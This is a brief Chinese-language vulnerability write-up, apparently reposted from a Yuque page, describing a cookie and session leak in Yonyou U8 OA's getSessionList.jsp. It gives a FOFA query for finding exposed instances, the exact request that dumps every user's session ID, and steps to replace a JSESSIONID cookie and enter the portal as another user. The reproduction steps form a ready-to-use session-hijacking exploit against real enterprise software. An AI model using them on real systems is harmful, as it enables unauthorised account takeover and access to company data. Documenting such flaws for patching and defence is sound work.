登录 白背景

用友U8 OA getSessionList.jsp用户cookie信息泄露漏洞

一、漏洞简介

用友U8+承载了用友人十余年来为成长型企业的信息化管理所倾注的心血,它以U8财务业务一体化、U8ERP、U8All-in-One、U8+形象伴随中国经济的高速发展一路走来,见证了成长型企业信息化从7个应用模块到126个产品及行业应用。用友U8 getSessionList.jsp处存在用户cookie信息泄漏漏洞,攻击者可利用漏洞获取到所有用户的SessionID,利用泄露的SessionID即可登录该用户并获取shell。

二、影响版本

  • 用友U8 OA

三、资产测绘

  • fofa"用友U8-OA"
  • 特征

image.png

四、漏洞复现

  1. 执行POC读取用户cookie
/yyoa/ext/https/getSessionList.jsp?cmd=getAll

image.png

  1. 获取SESSION之后访问:/yyoa/common/js/menu/menu.jsp,替换Cookie
JSESSIONID=XXXXXXXXXXXXXXXXXXXXXXXXXXX
  1. 访问/yyoa/portal/portalIndex.jsp进入首页

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/cpykurrf417zvt33